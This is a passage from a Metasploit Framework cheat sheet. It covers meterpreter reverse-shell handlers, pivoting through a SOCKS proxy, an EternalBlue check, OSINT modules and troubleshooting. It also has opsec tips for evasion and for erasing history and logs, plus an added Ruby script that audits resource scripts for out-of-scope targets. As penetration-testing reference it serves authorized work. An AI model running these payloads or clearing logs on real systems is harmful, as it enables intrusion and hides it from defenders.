set PAYLOAD windows/x64/meterpreter/reverse_http
set LHOST 192.168.1.50
set LPORT 80
exploit -j

# Lateral movement coordination
route add 10.0.0.0/24 1
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
```

### OSINT Integration

```bash
# Use theHarvester results
use auxiliary/gather/search_email_collector
set DOMAIN target.com
run

# Shodan integration
use auxiliary/gather/shodan_search
set SHODAN_APIKEY your_api_key
set QUERY "apache city:\"New York\""
run

# Social engineering
use auxiliary/gather/social_engineering_toolkit
set TARGET_EMAIL admin@target.com
run
```

## Troubleshooting

### Common Issues and Solutions

```bash
# Database connection issues
msfdb status
msfdb reinit
sudo systemctl restart postgresql

# Module loading errors
reload_all
updatedb

# Payload generation failures
msfvenom --list formats
msfvenom --list encoders
msfvenom --list platforms

# Session connectivity issues
sessions -l
sessions -k 1
route print
route flush

# Permission issues
sudo chown -R $USER:$USER ~/.msf4
sudo chmod -R 755 ~/.msf4
```

### Performance Optimization

```bash
# Increase database performance
echo "shared_buffers = 256MB" | sudo tee -a /etc/postgresql/*/main/postgresql.conf
echo "effective_cache_size = 1GB" | sudo tee -a /etc/postgresql/*/main/postgresql.conf
sudo systemctl restart postgresql

# Optimize threading
set THREADS 20
set MaxSessions 10

# Memory optimization
ulimit -n 4096
echo "* soft nofile 4096" | sudo tee -a /etc/security/limits.conf
echo "* hard nofile 4096" | sudo tee -a /etc/security/limits.conf

# Clean up old sessions
sessions -K
db_rebuild_cache
```

### Debugging

```bash
# Enable verbose output
set VERBOSE true

# Debug mode
msfconsole -L -o /tmp/msf.log

# Ruby debugging
irb
load '/usr/share/metasploit-framework/lib/msf/core.rb'
framework = Msf::Simple::Framework.create

# Module debugging
use exploit/windows/smb/ms17_010_eternalblue
set VERBOSE true
check
```

## Security Considerations

### Operational Security

```bash
# Use VPN or proxy
set Proxies socks5:127.0.0.1:9050

# Randomize source ports
set CPORT 1024-65535

# Use legitimate user agents
set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Implement delays
set WfsDelay 10
set Jitter 25

# Clean up artifacts
rm /tmp/payload.exe
history -c
```

### Legal and Ethical Considerations

```bash
# Document authorization
echo "Authorized penetration test - $(date)" > /tmp/authorization.txt
echo "Scope: 192.168.1.0/24" >> /tmp/authorization.txt
echo "Contact: security@company.com" >> /tmp/authorization.txt

# Limit scope
set RHOSTS 192.168.1.100-110  # Only authorized targets
set ExitOnSession true        # Limit session creation

# Avoid destructive actions
set DisablePayloadHandler true
set PrependMigrate false
```
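
Scope limitation is only as good as the check that enforces it: a resource script run with `msfconsole -r` can carry `set RHOSTS` lines that drift outside the authorized range. The Ruby script below is an added example, not part of the original cheat sheet or of Metasploit: it audits a resource script before it is loaded, expanding every `RHOST`/`RHOSTS` value in the forms this sheet uses (single address, CIDR, `192.168.1.100-110` range) against an authorized scope list and reporting any address that falls outside it. The scope, the sample script and the `file:` handling are assumptions for the example; `file:` references and hostnames are reported for manual review rather than resolved.

```ruby
# Added example: pre-flight scope check for a Metasploit resource script.
# Standard library only (IPAddr).
require 'ipaddr'

# Assumed authorized scope for this engagement (matches the sheet's example).
AUTHORIZED_SCOPE = ['192.168.1.0/24'].map { |cidr| IPAddr.new(cidr) }.freeze

# Constructed resource script, one target line deliberately out of scope.
SAMPLE_RC = <<~RC
  use exploit/multi/handler
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  set LHOST 192.168.1.50
  setg RHOSTS 192.168.1.100-110
  set RHOST 10.0.0.1
  set RHOSTS file:/path/to/targets.txt
  exploit -j
RC

# Expand an RHOSTS value into IPAddr objects. Supports a single address,
# CIDR notation, the short range "192.168.1.100-110" and the long range
# "192.168.1.100-192.168.1.110". Returns nil for file: references and
# anything that is not an IP literal (hostnames), which need manual review.
def expand_targets(spec)
  return nil if spec.start_with?('file:')
  if spec.include?('/')
    IPAddr.new(spec).to_range.to_a
  elsif spec.include?('-')
    first, last = spec.split('-', 2)
    start_ip = IPAddr.new(first)
    # Short form carries only the final octet after the dash.
    last = "#{first.rpartition('.').first}.#{last}" unless last.include?('.')
    (start_ip..IPAddr.new(last)).to_a
  else
    [IPAddr.new(spec)]
  end
rescue IPAddr::InvalidAddressError
  nil
end

# Walk the script and return one finding per target-setting line:
# :ok, :out_of_scope (with the offending addresses) or :needs_review.
def audit_resource_script(rc_text, scope = AUTHORIZED_SCOPE)
  findings = []
  rc_text.each_line.with_index(1) do |line, lineno|
    cmd, opt, spec = line.strip.split(/\s+/, 3)
    next unless spec && %w[set setg].include?(cmd) && %w[RHOST RHOSTS].include?(opt)
    targets = expand_targets(spec)
    if targets.nil?
      findings << { line: lineno, spec: spec, status: :needs_review, out_of_scope: [] }
      next
    end
    bad = targets.reject { |ip| scope.any? { |net| net.include?(ip) } }
    findings << { line: lineno, spec: spec,
                  status: bad.empty? ? :ok : :out_of_scope,
                  out_of_scope: bad.map(&:to_s) }
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  audit_resource_script(SAMPLE_RC).each do |f|
    extra = f[:out_of_scope].empty? ? '' : " (#{f[:out_of_scope].join(', ')})"
    puts "line #{f[:line]}: #{f[:spec]} -> #{f[:status]}#{extra}"
  end
end
```

Running the audit and refusing to load any script with an `:out_of_scope` finding gives the "Only authorized targets" comment above an actual enforcement point; `:needs_review` lines (wordlist files, hostnames) still have to be checked by hand against the authorization record.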

### Data Protection

```bash
# Encrypt database backup
msfdb stop
sudo -u postgres pg_dump msf > /tmp/msf_backup.sql
gpg -c /tmp/msf_backup.sql
rm /tmp/msf_backup.sql

# Secure communications
set LHOST 192.168.1.50
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai

# Clean up logs
history -c
rm ~/.msf4/logs/*
sudo rm /var/log/postgresql/*
```

**Security Notice**: Metasploit Framework is a powerful penetration testing tool that should only be used on systems you own or have explicit written authorization to test. Unauthorized use of this tool against systems you do not own is illegal and unethical. Always make sure you have proper authorization before performing any security testing. This cheat sheet is intended for educational purposes and authorized security testing only. Users are responsible for complying with all applicable laws and regulations in their jurisdiction.

**Additional Resources**:

- [Official Metasploit Documentation](LINK_4)
- [Metasploit Unleashed Course](LINK_4)
- [Rapid7 Community](LINK_4)
- [GitHub Repository](LINK_4)